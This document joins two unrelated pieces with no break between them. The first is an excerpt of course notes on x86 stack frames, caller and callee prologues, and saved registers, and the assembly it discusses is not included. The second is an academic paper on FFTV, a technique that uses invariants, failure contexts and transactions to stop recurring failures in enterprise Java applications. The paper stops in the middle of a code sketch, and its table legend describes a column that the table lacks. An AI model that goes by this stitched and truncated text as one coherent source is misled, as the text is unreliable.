A breakdown of how this code was compiled can be found on this Compiler Explorer snippet which highlights corresponding lines between C and x86 and shows the exact compiler flags used. Feel free to play around with different optimizations and other compiler flags to see how the corresponding x86 code changes.
### 2.3 Stack Frame
```c
int p = 0;
int bar(int x, int y, int z) {
int w = x + y - z;
return w + 1;
}
void foo(int a, int b) {
p = a + b + bar(3, 4, 5);
}
```
foobar.c
call.s (assembly listing of foobar.c; not reproduced here)
1. Which lines of the code correspond to a caller/callee prologue/epilogue?
The most apparent caller/callee pair is `foo`/`bar`. Lines 24-27 are the prologue of the caller that set up the arguments. Line 29 is the epilogue of the caller that cleans up the stack by simply moving up the stack pointer. Lines 4-6 are the prologue of the callee that push the base pointer and make room for local variables. While there’s only one local variable `w` in `bar`, the compiler still makes room for 16 bytes due to the default stack boundary of 16 bytes per GCC’s `-mpreferred-stack-boundary` flag. Lines 13-15 are the epilogue of the callee that restore the stack pointer and return back to the caller.
It’s important to recognize `foo` is a function as well, meaning it will be in the callee position when it’s called by another function. Similar to when `bar` was the callee, lines 17-20 and lines 33-35 serve as the prologue and epilogue respectively when `foo` is the callee.
2. What does line 19 do in `call.s`? Why is it necessary?
Line 19 saves the EBX register by pushing it onto the stack. EBX is a callee-saved register, so `foo` is responsible for saving it before using it.
3. Why is EDX not saved by `foo` before calling `bar` despite being used in `bar`?
GPRs are saved only if the register content needs to persist after the function call. EDX was used as a temporary register for computation in lines 21-23, so its value does not need to persist past the call to `bar`.
4. Draw the stack frame and contents of relevant registers after executing line 13 of `call.s`.
---
*https://gcc.gnu.org/onlinedocs/gcc-4.2.4/gcc/i386-and-x86_002d64-Options.html*
ESP points to the bottom of the stack. EBP points to the “EBP of foo”. EAX holds 3, EBX holds \(a + b\), and EDX holds 3.
Towards Self-Protecting Enterprise Applications
Davide Lorenzoli, Leonardo Mariani, and Mauro Pezzè
Università degli Studi di Milano Bicocca
via Bicocca degli Arcimboldi, 8
20126 Milano, Italy
{lorenzoli,mariani,pezze}@disco.unimib.it
Abstract
Enterprise systems must guarantee high availability and reliability to provide 24/7 services without interruptions and failures. Mechanisms for handling exceptional cases and implementing fault tolerance techniques can reduce failure occurrences, and increase dependability. Most of such mechanisms address major problems that lead to unexpected service termination or crashes, but do not deal with many subtle domain dependent failures that do not necessarily cause service termination or crashes, but result in incorrect results.
In this paper, we propose a technique for developing self-protecting systems. The technique proposed in this paper observes values at relevant program points. When the technique detects a software failure, it uses the collected information to identify the execution contexts that lead to the failure, and automatically enables mechanisms for preventing future occurrences of failures of the same type. Thus, failures do not occur again after the first detection of a failure of the same type.
1 Introduction
Enterprise systems are long living applications that integrate persistent and transaction-based services to offer core business functionalities to large populations of users who continuously access enterprise applications to meet relevant business objectives [8]. Dependability properties, such as availability, safety and reliability, are essential quality attributes, and enterprise systems are thoroughly tested throughout all development phases, from system design to deployment, to verify the satisfaction of such essential properties. However, because of the complexity of these systems, faults cannot be completely eliminated from deployed applications [3]. Due to the continuous accesses from many users, failures can be experienced repeatedly before the responsible faults are identified and before suitable patches are developed, tested and deployed. Failure prevention techniques aim at mitigating the problem of recurrent failures by protecting systems from failure occurrences while waiting for faults to be identified and removed.
Failure prevention techniques can be roughly classified as failure-specific and general techniques. Failure-specific techniques are based on design-time prediction of failures that are likely to occur at run-time, and on the design of mechanisms to protect the system from the occurrence of the predicted failures. Common failure-specific techniques are exception handling and defensive programming [21, 29]. We can, for example, design exception handlers to manage accesses to non-existing files, even if such events should not happen. Failure-specific techniques can capture a limited subset of potential faults, but do not protect from problems that are not predicted and handled at design-time.
General techniques are based on mechanisms that handle catastrophic events that do not depend on the specific application, such as transactional services and fault-tolerance mechanisms [25, 1]. Fault tolerance mechanisms can, for example, automatically hide single algorithmic faults by replicating computations. General techniques do not require predicting the exact cause of failures, but are mostly limited to domain independent failures, such as system crashes and hardware failures.
In this paper, we propose a self-protection technique, called FFTV (From Failures To Vaccine), that increases the reliability of enterprise applications by capturing the context of observed failures, and preventing failures of the same type from occurring again. Initially, FFTV monitors system executions, extracts information related to failures, and creates models that describe the context of failures, that is, the sequence of events that led to the failure. Subsequently, FFTV matches executions with failure context models. When FFTV identifies an execution that matches a failure context, it activates suitable protection mechanisms that either prevent the system from failing or heal the problem and enable the successful termination of a running functionality that
would fail otherwise. In this paper, we use transactional services to dynamically encapsulate dangerous executions into safe execution contexts, in order to prevent loss of data or reaching faulty states. The technique resumes the application in a “safe” state, that is, a state that allows users to continue interacting with the system.
FFTV is not an alternative to failure-specific and general mechanisms; it complements the set of problems dealt with by existing techniques. Failure-specific mechanisms prevent failures related to exceptional events that can be predicted at design-time. General mechanisms prevent failures that depend on general catastrophic events. FFTV prevents specific problems that are difficult to predict at design-time, but can be identified at run-time by learning from program executions.
FFTV can address different classes of problems by capturing different information and distilling different models. In this paper, we exemplify the approach by referring to problems caused by unexpected data values passed between components or assigned to state variables.
The paper is organized as follows. Section 2 presents the overall approach. Section 3 illustrates the design-time activities required to develop FFTV-enabled systems. Section 4 describes the generation of models used to identify unexpected values. Section 5 shows how to build failure contexts from observed failures. Sections 6 and 7 detail the techniques for analyzing and detecting failures that comprise the building of failure contexts. Section 8 shows how transactional services can be used to implement protection mechanisms. Section 9 presents early experimental results obtained by applying FFTV to prevent a specific class of faults injected into the Sun PetStore enterprise system. Section 10 discusses related work, and Section 11 presents conclusions.
2 FFTV: From Failure to Vaccine
FFTV monitors system executions, identifies contexts associated with observed failures, that is the conditions under which the system failed, and activates mechanisms to protect the systems when executions match failure contexts.
Figure 1 illustrates FFTV. At design-time, developers define the fault types addressed by FFTV, and design oracles that detect these faults. Oracles are then compiled into the target system. Fault types and oracles can be specified manually, for instance, by specifying assertions [19], or derived automatically from specifications, for instance, by compiling high-level properties into code-level assertions [13]. Once oracles have been defined, FFTV uses static analysis techniques to automatically identify the program points that can affect the properties defined by the oracles. These program points are monitored at testing-time to extract information about successful executions, that is executions that pass the checks computed by oracles.
In this paper, we instantiate the technique on state-based faults, that is, faults that depend on executions that erroneously change the state of the system, and then use the corrupted state, leading to a failure. To capture these faults, we use JML assertions to write oracles that can identify unexpected values [16], and def-use analysis to identify the state variables that can affect the evaluation of existing assertions [12]. So far, we have generated assertions manually, but we are working on the automatic generation of assertions from specifications.
At testing time, FFTV records the information flowing through relevant program points, and stores the data extracted from executions of successful test cases into a repository. After the testing sessions, FFTV uses these data to automatically derive models that represent in a compact and general way properties related to relevant program points.
In this paper, we apply FFTV by recording values of the state variables identified by data-flow analysis, and we use Daikon [7] to infer general relations, expressed as Boolean expressions, between these state variables. Column Models in Table 1 shows examples of properties that can be automatically inferred with Daikon.
At run-time, FFTV analyses failures, and detects executions that may lead to failures of the same type, that is, it identifies both the causes of failures (failure analysis), and the executions that can likely lead to failures similar to the identified ones (failure detection).
Failure analysis is based on failures detected by oracles. The observer analyzes the data monitored at relevant program points, and compares these data with the models built at testing time, in order to identify the causes of experienced failures. The analysis produces failure contexts, which are used to identify situations that will likely lead to failures of the same type as those experienced in the past. The types of failures that are addressed by failure contexts depend on the inference engines. In this paper, we detect failures that derive both from state-based faults, that is, unexpected values assigned to variables, and from interface problems, that is, unexpected values assigned to parameters. In both cases, we detect unexpected values with Boolean expressions.
During normal system execution, FFTV compares the data monitored at relevant program points with the recorded failure contexts. If the execution matches a failure context, FFTV activates protection (or healing) mechanisms to prevent system failure, thus increasing the dependability of the software system.
In this paper, we design protection mechanisms for software systems that implement the MVC design pattern, a widely adopted pattern for designing three-layered enterprise systems [23]. In the MVC design pattern, each action that can be executed by users is clearly represented by an individual entity (usually a class or a method).
We protect these systems by encapsulating dangerous executions within transactions (transaction services are always available in J2EE compliant application servers and are widely adopted in enterprise systems in general [14]). According to MVC, we identify the stable states as the states of the system between the execution of consecutive actions. When FFTV identifies the execution of actions that can lead to system failures, it dynamically embeds the potentially dangerous actions within a transaction. If the software system fails, FFTV resumes the system execution from the last saved stable state, thus discarding the failing transaction but allowing users to continue interacting with the system and execute other actions. Users who perform the same action again will experience similar detect-resume interactions.
The FFTV approach can be instantiated with different techniques at design, testing and run-time, to capture and heal different types of failures. We are currently investigating finite state machines and temporal logic as oracles to dynamically capture component integration problems, inter-component invocations as relevant program points, finite state machines inferred with kBehavior [18] as model for interactions, and equivalent scenarios as healing technique [4].
3 Oracles and Relevant Program Points
Oracles check the properties selected by developers according to the criticality of the components, the complexity of the implementations and the importance of the functionalities. For example, in the case of a functionality that registers new users into the system, oracles can verify that at least user name and password are correctly recorded in the database.
In this paper, we consider oracles specified as code-level assertions [6], which are particularly well suited to reveal failures that depend on wrong values of state variables and parameters. We use the Java Modeling Language (JML) [17] to indicate the conditions over program variables that are expected to hold at run-time. JML annotations are Java comments prefixed with @. Line 37 of Figure 2 shows an example of a JML assertion specifying that the return value of method getTotalCost must be greater than 0 (@ ensures \result > 0). When an assertion is violated, a generic AssertionException is thrown.
We detect failures that depend on both violations of user-specified oracles, and uncaught exceptions. Since we expect that no exceptions should be observed by the controller of a MVC-based system, we treat all exceptions observed by the controller as failures.
Given a set of JML assertions, we automatically analyze the application to identify the relevant program points that can influence the oracles. We then instrument the identified points to extract the information needed for identifying failure contexts. We identify the program variables that can impact the evaluation of the expressions computed in JML assertions by means of data-flow analysis [12]. If a statement s assigns a value to a variable v, we say that s defines v; if a statement s references a variable v, we say that s uses v. If there exists an execution path p from a statement s_1 that defines variable v to a statement s_2 that uses the same variable v, and no statement in p (with the exception of s_1) defines v, we say that p is a definition-clear path with respect to variable v and (s_1, s_2) is a definition-use pair for v. A sequence (s_1, s_2, s_3, . . . , s_k), where each pair (s_i, s_{i+1}) is a definition-use pair, and in node s_{i+1} the use of variable v_i influences the definition of variable v_{i+1}, is a definition-use chain of length k [11, 10].
Figure 2. An example of program with an assertion and a def-use chain. In the figure, hyperedges relate definitions and uses, and are graphically identified with arrowhead patterns; def-use chains can be obtained by recursively following hyperedges.

Given a variable v and a statement s where v is used, we denote with chain^v_k(s) the set of all definition-use chains (s_1, s_2, . . . , s_{k−1}, s). Given a definition-use chain c =
\( (s_1^{v_1}, s_2^{v_2}, \ldots, s_k^{v_k}) \), we use \( \text{stat}(c) \) to denote the set of all the statements included in \( c \), that is \( \text{stat}(c) = \{s_1, s_2, \ldots, s_k\} \). Given \( v \) used in statement \( s \), \( \text{stat}_k^v(s) \) is the set of all the statements, up to a depth \( k \), that may influence the value of \( v \) in \( s \), that is \( \text{stat}_k^v(s) = \bigcup_{c \in \text{chain}_k^v(s)} \text{stat}(c) \).
Given a JML assertion \( J \) and variables \( v_i \) used in \( J \), the set of statements that may influence the value of \( v_i \) is given by \( \text{stat}_k^{v_i}(J) \). The set of relevant program points associated with \( J \) is given by \( \bigcup_{v_i \text{ used in } J} \text{stat}_k^{v_i}(J) \), where \( k \) is a parameter. Large values of \( k \) provide higher coverage of relevant program points.
Let us consider for example the assertion \( \text{result} > 0 \) associated with method \( \text{getTotalCost} \) shown in Figure 2. The definition-use chains of length 3 for this assertion are indicated by hyperedges that relate definitions and uses of variables. The set of relevant program points can be obtained starting from the assertion \( \text{result} > 0 \) and selecting the program points reachable by following the hyperedges. In this example, the set of relevant program points is the set of statements at lines 4, 5, 9, 11, 23, 25, 26, 29, 30, 33, 34, 39.
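For straight-line code, the computation of \( \text{stat}_k^v(s) \) can be sketched as follows. The program representation, class name, and helper methods below are hypothetical illustrations rather than the actual FFTV implementation, and a real analysis must also handle branches and loops:

```java
import java.util.*;

public class DefUse {
    // A statement with the variables it defines and uses (hypothetical toy model).
    record Stmt(int line, Set<String> defs, Set<String> uses) {}

    // Index of the last definition of v before statement idx (straight-line code,
    // so the last definition is the only reaching one).
    static int reachingDef(List<Stmt> prog, int idx, String v) {
        for (int i = idx - 1; i >= 0; i--)
            if (prog.get(i).defs().contains(v)) return i;
        return -1;
    }

    // Lines of the statements, up to chain depth k, that may influence the value
    // of v used at statement idx: the set stat_k^v(s) of the paper.
    static Set<Integer> statK(List<Stmt> prog, int idx, String v, int k) {
        Set<Integer> out = new TreeSet<>();
        if (k == 0) return out;
        int d = reachingDef(prog, idx, v);
        if (d < 0) return out;
        out.add(prog.get(d).line());
        for (String used : prog.get(d).uses())
            out.addAll(statK(prog, d, used, k - 1));
        return out;
    }

    public static void main(String[] args) {
        // Toy program:  1: a = input()   2: b = a + 1   3: c = b * 2   4: assert c > 0
        List<Stmt> prog = List.of(
            new Stmt(1, Set.of("a"), Set.of()),
            new Stmt(2, Set.of("b"), Set.of("a")),
            new Stmt(3, Set.of("c"), Set.of("b")),
            new Stmt(4, Set.of(), Set.of("c")));
        // Relevant program points for the assertion at index 3, depth 3:
        System.out.println(statK(prog, 3, "c", 3)); // prints [1, 2, 3]
    }
}
```

Here the assertion on c at line 4 is influenced, through def-use chains of length up to 3, by the definitions at lines 1, 2 and 3, mirroring how the relevant program points of Figure 2 are collected.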
4 Model Generation
At testing time, test designers execute test suites and collect data from relevant program points. To generate models of successful behavior, we consider only the data obtained from successful executions of test cases. The type and amount of information extracted by FFTV depend on both the considered types of failures and the technologies used to prevent the failures or heal the related faults. In this paper, we extract information from relevant program points by recording the values of defined variables both before and after the execution of a relevant program point, and the values of used variables before a relevant program point.
FFTV automatically produces general models of the observed behaviors from the data collected during testing. When executing the deployed application, FFTV uses these models to identify executions that differ from the behavior observed at testing-time, and thus deserve further attention. In this paper, we produce general models of the observed behavior with the Daikon inference engine [7], which can identify relations between sets of variables at given program points. Properties are expressed as Boolean expressions. The models produced by FFTV represent relations between values observed during execution, thus the accuracy of the models depends on the quality of the test cases, which roughly corresponds to the coverage of the execution space. According to our early experience, a well-designed set of test cases generates accurate models of the software system.
Let us consider, for instance, the program point at line 25 in the class \( \text{Item} \) shown in Figure 2. Daikon can infer properties like \( \text{item.quantity'} \geq 1 \) and \( \text{item.quantity'} = \text{qty} \). The former property specifies that the final value of the quantity is always greater or equal than 1, while the latter indicates that the final value of quantity corresponds to the value of variable \( \text{qty} \).
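As a drastically simplified stand-in for this kind of inference (we do not reproduce Daikon itself), the sketch below learns a single range invariant from the values observed during passing runs and flags values outside the learned range; the class and method names are invented for illustration:

```java
import java.util.stream.IntStream;

public class RangeModel {
    private int lo = Integer.MAX_VALUE;
    private int hi = Integer.MIN_VALUE;

    // Called at a relevant program point during successful test executions.
    void observe(int v) { lo = Math.min(lo, v); hi = Math.max(hi, v); }

    // At run-time, a value outside the inferred range [lo, hi] violates the model.
    boolean violates(int v) { return v < lo || v > hi; }

    @Override public String toString() { return lo + " <= value <= " + hi; }

    public static void main(String[] args) {
        RangeModel quantity = new RangeModel();
        IntStream.of(1, 3, 7, 13).forEach(quantity::observe);
        System.out.println(quantity);              // prints 1 <= value <= 13
        System.out.println(quantity.violates(-1)); // prints true: anomalous value
        System.out.println(quantity.violates(5));  // prints false: within the model
    }
}
```

The inferred range 1 <= quantity <= 13 corresponds to models such as P9.1 in Table 1, and the value -1 assigned by the faulty update is exactly the kind of anomaly such a model flags.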
5 Failure Contexts
When running in the field, FFTV monitors the values of the variables at relevant program points, identifies anomalous values, which are values that violate models derived at testing-time, detects failures by means of oracles, and indicates when actions start and finish.
When a new type of failure is observed, FFTV computes its failure context, that is, the sequence of events that led to the failure. The failure context cannot prevent the first occurrence of the failure, but can be used to detect future occurrences of events that may lead to failures of the same type, and prevent further failure occurrences.
6 Failure Analysis
When oracles reveal failures, the information extracted from controllers at relevant program points is used to automatically build failure contexts. Failure contexts capture the anomalous run-time conditions that occurred before the observed failures. In this paper, we generate failure contexts by using both the sequence of the last \( k + 1 \) actions (action \( k + 1 \) is the one that cannot be successfully completed because it generates a failure) and the anomalous values that are detected at relevant program points (\( k \) is a parameter of the technique).
The rationale is that many failures occur within executions that are characterized by particular combinations of actions and data values. Thus, by examining the last \( k + 1 \) actions, we can detect a set of unexpected events related to a type of failure experienced in previous executions. The aim of FFTV is not to capture either the exact source of failures or the complete sequence of events that leads to a failure, but to identify a few anomalous values that are usually observed before the occurrence of a failure. These values are used as failure predictors.
As illustrated by the example in the next subsection, we use non-disruptive prevention and healing strategies. Thus, false positives, that is, sequences of events that are wrongly identified as potentially leading to failures, do not introduce additional failures. However, false positives introduce overhead caused by the unnecessary activation of prevention and healing mechanisms, so it is important to reduce the number of false positives to avoid performance problems. We address the problem by introducing a confidence threshold \( \text{conf} \) that estimates the quality of failure contexts and allows us to discard low quality contexts. When the percentage of false positives identified by a given failure context exceeds \( \text{conf} \), we consider the context not relevant and discard it. We record deleted failure contexts to avoid their re-instantiation.
The use of a limited window of size \( k + 1 \) to identify events that can be included into failure contexts allows for several optimizations. In particular, the observer needs only to preserve information about the last \( k \) actions; each time a new action is observed, information about the oldest one can be discarded. In presence of a reasonable amount of available memory and with a limited \( k \), the observer can keep run-time data in primary memory only, without accessing secondary memory, and thus with small overhead.
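The bounded observation window can be realized with a simple FIFO buffer; the sketch below (class and method names hypothetical) keeps only the last k actions in memory, discarding the oldest on each new observation:

```java
import java.util.ArrayDeque;
import java.util.Deque;

public class ActionWindow {
    private final int k;
    private final Deque<String> window = new ArrayDeque<>();

    ActionWindow(int k) { this.k = k; }

    // Keep only the last k actions: the oldest one is discarded on overflow,
    // so the observer works in primary memory with bounded space.
    void record(String action) {
        if (window.size() == k) window.removeFirst();
        window.addLast(action);
    }

    Deque<String> lastActions() { return window; }

    public static void main(String[] args) {
        ActionWindow w = new ActionWindow(3);
        for (String a : new String[]{"AddItem", "RemoveItem", "UpdateItem", "AddItem"})
            w.record(a);
        System.out.println(w.lastActions()); // prints [RemoveItem, UpdateItem, AddItem]
    }
}
```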
FFTV generates failure contexts from failures, the last \( k + 1 \) actions and the corresponding model violations in three steps. In the first step, FFTV summarizes the sequence of the first \( k \) actions (the action that produces the failure is not considered) and the corresponding model violations with an annotated FSM. For example, Figure 3 shows the annotated FSM corresponding to the sample execution presented in Table 1. Transitions represent actions, and annotations indicate the models that have been violated by the corresponding action. Note that only actions that refer to program points occur in failure contexts. Actions that do not refer to program points are excluded, since they do not contribute to the failure.
Annotated FSMs represent executions at the granularity of actions, and detect anomalous events at the granularity of program points. Specifying actions as labels of FSM transitions abstracts from low level details, such as sequences of method executions, that would introduce useless details in the model. Using program points as indicators of violations, such as unexpected variable values, captures low level faults, even if the model focuses on high-level information.
Figure 3. The annotated FSM associated with the failure shown in Table 1
In the second step, FFTV augments the annotated FSM with weights that indicate the relevance of the transitions (actions and corresponding violations) with respect to the identification of a failure. We assign weights by following these rules:
- actions associated with no violations are likely not to contribute to failure contexts, thus they are assigned a low weight equal to 1.
- in general, anomalous values do not generate a single model violation, but cause several model violations across different actions. Actions associated with model violations that occur early in the sequence are usually more important than actions associated with model violations that occur late in the sequence, because late anomalous values are often caused by anomalous values generated early in the execution sequence. The following formula assigns to actions with anomalies a weight proportional to the occurrence of the actions in the sequence of anomalous actions, by considering both homogeneous and heterogeneous actions:
<table>
<thead>
<tr>
<th>Action</th>
<th>Method</th>
<th>Variables traced at program points</th>
<th>Model (Boolean expression) / violating value</th>
<th>Model ID</th>
</tr>
</thead>
<tbody>
<tr>
<td>Add item</td>
<td>GUI.addItem</td>
<td>P6.quantity</td>
<td>P6.quantity > 0</td>
<td>P6.1</td>
</tr>
<tr>
<td></td>
<td></td>
<td>P7.price</td>
<td>0 < P7.price <= 2000</td>
<td>P7.1</td>
</tr>
<tr>
<td></td>
<td>AddItemAction.<init></td>
<td>P4.quantity</td>
<td>P4.quantity > 0</td>
<td>P4.1</td>
</tr>
<tr>
<td></td>
<td></td>
<td>P5.price</td>
<td>0 < P5.price <= 2000</td>
<td>P5.1</td>
</tr>
<tr>
<td></td>
<td>Item.setQuantity</td>
<td>P2.quantity</td>
<td>P2.quantity > 0</td>
<td>P2.1</td>
</tr>
<tr>
<td></td>
<td>Item.setPrice</td>
<td>P3.price</td>
<td>0 < P3.price <= 2000</td>
<td>P3.1</td>
</tr>
<tr>
<td>Remove item</td>
<td>-</td>
<td>-</td>
<td>-</td>
<td>-</td>
</tr>
<tr>
<td>Update item</td>
<td>GUI.updateItem</td>
<td>P9.quantity</td>
<td>1 <= P9.quantity <= 13</td>
<td>P9.1</td>
</tr>
<tr>
<td></td>
<td></td>
<td></td>
<td>P9.quantity = -1</td>
<td>-</td>
</tr>
<tr>
<td></td>
<td>UpdateItemAction.<init></td>
<td>P8.quantity</td>
<td>1 <= P8.quantity <= 13</td>
<td>P8.1</td>
</tr>
<tr>
<td></td>
<td></td>
<td></td>
<td>P8.quantity = -1</td>
<td>-</td>
</tr>
<tr>
<td></td>
<td>Item.setQuantity</td>
<td>P2.quantity</td>
<td>1 <= P2.quantity <= 13</td>
<td>P2.1</td>
</tr>
<tr>
<td></td>
<td></td>
<td></td>
<td>P2.quantity = -1</td>
<td>-</td>
</tr>
<tr>
<td></td>
<td>Item.getQuantity</td>
<td>P10.quantity</td>
<td>1 <= P10.quantity <= 13</td>
<td>P10.1</td>
</tr>
<tr>
<td></td>
<td></td>
<td></td>
<td>P10.quantity = -1</td>
<td>-</td>
</tr>
<tr>
<td>Add item</td>
<td>GUI.addItem</td>
<td>P6.quantity</td>
<td>P6.quantity > 0</td>
<td>P6.1</td>
</tr>
<tr>
<td></td>
<td></td>
<td>P7.price</td>
<td>0 < P7.price <= 2000</td>
<td>P7.1</td>
</tr>
<tr>
<td></td>
<td>AddItemAction.<init></td>
<td>P4.quantity</td>
<td>P4.quantity > 0</td>
<td>P4.1</td>
</tr>
<tr>
<td></td>
<td></td>
<td>P5.price</td>
<td>0 < P5.price <= 2000</td>
<td>P5.1</td>
</tr>
<tr>
<td></td>
<td>Item.setQuantity</td>
<td>P2.quantity</td>
<td>P2.quantity > 0</td>
<td>P2.1</td>
</tr>
<tr>
<td></td>
<td>Item.setPrice</td>
<td>P3.price</td>
<td>0 < P3.price <= 2000</td>
<td>P3.1</td>
</tr>
<tr>
<td></td>
<td>Item.getQuantity</td>
<td>P10.quantity</td>
<td>1 <= P10.quantity <= 13</td>
<td>P10.1</td>
</tr>
<tr>
<td></td>
<td></td>
<td></td>
<td>P10.quantity = -1</td>
<td>-</td>
</tr>
<tr>
<td>Add item</td>
<td>GUI.addItem</td>
<td>P6.quantity</td>
<td>P6.quantity > 0</td>
<td>P6.1</td>
</tr>
<tr>
<td></td>
<td></td>
<td>P7.price</td>
<td>0 < P7.price <= 2000</td>
<td>P7.1</td>
</tr>
<tr>
<td></td>
<td>AddItemAction.<init></td>
<td>P4.quantity</td>
<td>P4.quantity > 0</td>
<td>P4.1</td>
</tr>
<tr>
<td></td>
<td></td>
<td>P5.price</td>
<td>0 < P5.price <= 2000</td>
<td>P5.1</td>
</tr>
<tr>
<td></td>
<td>Item.setQuantity</td>
<td>P2.quantity</td>
<td>P2.quantity > 0</td>
<td>P2.1</td>
</tr>
<tr>
<td></td>
<td>Item.setPrice</td>
<td>P3.price</td>
<td>0 < P3.price <= 2000</td>
<td>P3.1</td>
</tr>
<tr>
<td></td>
<td>Item.getQuantity</td>
<td>P10.quantity</td>
<td>1 <= P10.quantity <= 13</td>
<td>P10.1</td>
</tr>
<tr>
<td></td>
<td></td>
<td></td>
<td>P10.quantity = -1</td>
<td>-</td>
</tr>
<tr>
<td>Purchase item</td>
<td>ShoppingCart.getTotalCost</td>
<td>P1.totalCost</td>
<td>P1.totalCost < P1.totalCost'</td>
<td>P1.1</td>
</tr>
<tr>
<td></td>
<td></td>
<td>P1.quantity</td>
<td>P1.quantity <= P1.totalCost'</td>
<td>P1.2</td>
</tr>
<tr>
<td></td>
<td></td>
<td>P1.price</td>
<td>...</td>
<td>...</td>
</tr>
<tr>
<td></td>
<td></td>
<td>P1.totalCost'</td>
<td>...</td>
<td>...</td>
</tr>
</tbody>
</table>
**Legend**
The table shows an observed execution that reveals a failure. A user executes the sequence of actions indicated in the first column of the table: starting with AddItem, and terminating with PurchaseItem. Column Method indicates the methods with relevant program points that are called while executing the corresponding actions (the methods are either directly executed by the action, or invoked by the View after the last action has been completed and before the next action is executed.) The program points considered in this example are obtained from a single assertion placed in method getTotalCost, as shown in Figure 2. The third column indicates the program points and variables related to methods shown in column 2. For instance, the method GUI.addItem includes two program points P6 and P7. Program point P6 traces the value of the variable `quantity` and program point P7 traces the value of the variable `price`. Column models indicates the models that have been derived from variables traced at program points. Column ID provides a unique name to each model. The last column Violations indicates the models that are violated by the considered execution, and the values that violate the models.
In summary, this table shows an execution of the sequence of actions AddItem, RemoveItem, UpdateItem, AddItem, AddItem, PurchaseItem, where action UpdateItem violates models P9.1, P8.1, P2.1 and P10.1, the last two addItem actions violate model P10.1 and action PurchaseItem violates both models P1.1 and P1.2 and the assertion in method getTotalCost.
Table 1. Example of run-time data for a shopping cart application
\[
w = \frac{200}{(k^{diff})^{n^{diff}} + (k^{same})^{n^{same}}}
\]
where
- \(k^{diff}\) is a reduction factor that indicates the relevance of an action based on the earlier presence, in the sequence, of actions of a different type associated with model violations
- \(k^{same}\) is a reduction factor that indicates the relevance of an action based on the earlier presence, in the sequence, of actions of the same type associated with model violations
- \(n^{diff}\) is the number of actions associated with model violations that differ from the current action and have been executed before it
- \(n^{same}\) is the number of actions associated with model violations that are of the same type as the current action and have been executed before it.
Assigning large values to parameters \(k^{diff}\) and \(k^{same}\) increases the relative relevance of actions associated with model violations depending on how early they occur in the sequence compared to other actions associated with model violations, while values close to 1 do not discriminate the relevance of the violations. In general, \(k^{same} > k^{diff}\), because repeated observations of actions associated with the same model violations are likely to be repeated observations of the same problem, which usually have a small impact on the whole failure context.
For instance, with values \(k^{diff} = 2.5\) and \(k^{same} = 5\), we generate the weights shown in Figure 4 for the FSM shown in Figure 3.
Figure 4. The weighted FSM associated with the failure shown in Table 1
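A quick numeric check of the weighting scheme. The sketch below assumes the formula reads \( w = 200 / ((k^{diff})^{n^{diff}} + (k^{same})^{n^{same}}) \) with results truncated to integers; this reading is an assumption on our part, chosen because it reproduces both the weight 100 of the first anomalous action and the total context weight 184 used in the matching example of Section 7. Class and method names are illustrative:

```java
public class Weights {
    // Assumed reading of the weight formula:
    // w = 200 / ((kDiff ^ nDiff) + (kSame ^ nSame)), truncated to an integer.
    static int weight(double kDiff, double kSame, int nDiff, int nSame) {
        return (int) (200.0 / (Math.pow(kDiff, nDiff) + Math.pow(kSame, nSame)));
    }

    public static void main(String[] args) {
        double kDiff = 2.5, kSame = 5.0;
        // UpdateItem, the first anomalous action (no earlier anomalous actions):
        int wUpdate = weight(kDiff, kSame, 0, 0);  // 200 / (1 + 1) = 100
        // First anomalous AddItem: one earlier anomalous action of a different type:
        int wAdd1 = weight(kDiff, kSame, 1, 0);    // 200 / (2.5 + 1) -> 57
        // Second anomalous AddItem: one earlier anomalous action of each type:
        int wAdd2 = weight(kDiff, kSame, 1, 1);    // 200 / (2.5 + 5) -> 26
        System.out.println(wUpdate + " " + wAdd1 + " " + wAdd2); // prints 100 57 26
        // Total context weight, including the violation-free AddItem (weight 1):
        System.out.println(1 + wUpdate + wAdd1 + wAdd2);         // prints 184
    }
}
```

Under this interpretation, the failure context of Table 1 has total weight 1 + 100 + 57 + 26 = 184, which matches the denominator used in the matching computation of the next section.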
7 Failure Detection
Failure contexts include sets of actions, either associated with anomalous values or not, that have been recorded before a failure and are likely to be related to the failure occurrence. Each failure context is associated with an activating action. Whenever FFTV detects an activating action \(a\) during the execution of the system, it compares the last \(k\) actions that have been executed before \(a\) with all failure contexts that include \(a\) as activating action. If a failure context indicates that the execution of \(a\) can cause problems, suitable healing or prevention strategies are activated. FFTV checks for the presence of a potentially failing execution when the execution of an activating action is requested by the user, but before the action itself is executed, and thus before the possible failure.
Failure contexts can be checked by measuring the number of actions in the contextual events that have been executed within the last \(k\) actions. We consider an action in the contextual events as executed when both the name of the action and at least \(cov\) of its anomalies, i.e., the set of violated models, match (\(0 \leq cov \leq 1\) indicates the minimum value of the ratio between the number of executed anomalies and the total number of anomalies). In our early experiments, we set \(cov\) to 0.8. For instance, if we consider the failure context shown in Figure 5 and the execution AddItem AddItem AddItem UpdateItem PurchaseItem, where only UpdateItem generates the anomalies P2.1, P8.1, P9.1 and P10.1, we executed 2 out of 4 actions. The total weight of the 2 executed actions is \(1 + 100 = 101\).
We do not require the complete matching of a failure context, because failure contexts include both useful information and "noise", that is, actions that are not directly related to the failure. We usually activate a failure context even when only a small fraction of the actions occurring in the context has been executed. This approach is facilitated
by the use of non-disruptive healing/prevention strategies, which do not cause additional problems in presence of false positives. The matching of a failure context is measured by weighting the actions as follows:
\[
\text{coverage} = \frac{\sum_{a \in \text{covered actions}} w(a)}{\sum_{a \in \text{failure context}} w(a)}
\]
where \(w(a)\) indicates the weight of action \(a\) in the considered failure context. We match a failure context when the coverage measured with the formula above exceeds an activation rate threshold. We usually set activation rate = 0.5, because executing half of the weighted actions occurring in a failure context indicates that either the actions corresponding to the most important anomalies or many anomalies with low weights have already occurred. For instance, the 2 actions executed by the example execution above provide a matching measure of \(\frac{101}{184} \approx 0.55 > 0.5\); thus, FFTV activates the failure context. In contrast, an execution sequence addItem, addItem, removeItem, PurchaseItem, with actions that generate no violations, includes only 1 action of the context, with a total weight of 1. The matching level is \(\frac{1}{184} \approx 0.005 < 0.5\), thus FFTV would not activate the failure context.
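The matching computation for the two example executions above can be sketched as follows; the helper class is illustrative, and the weights are those of the Figure 4 example:

```java
public class Matching {
    static final double ACTIVATION_RATE = 0.5;

    // coverage = (sum of weights of covered actions) / (total weight of the context)
    static double coverage(int[] coveredWeights, int totalContextWeight) {
        int sum = 0;
        for (int w : coveredWeights) sum += w;
        return (double) sum / totalContextWeight;
    }

    public static void main(String[] args) {
        int total = 184; // total weight of the example failure context
        // Violation-free AddItem (weight 1) and anomalous UpdateItem (weight 100):
        double m1 = coverage(new int[]{1, 100}, total);      // 101 / 184 ~ 0.55
        System.out.println(m1 > ACTIVATION_RATE); // prints true: context activated
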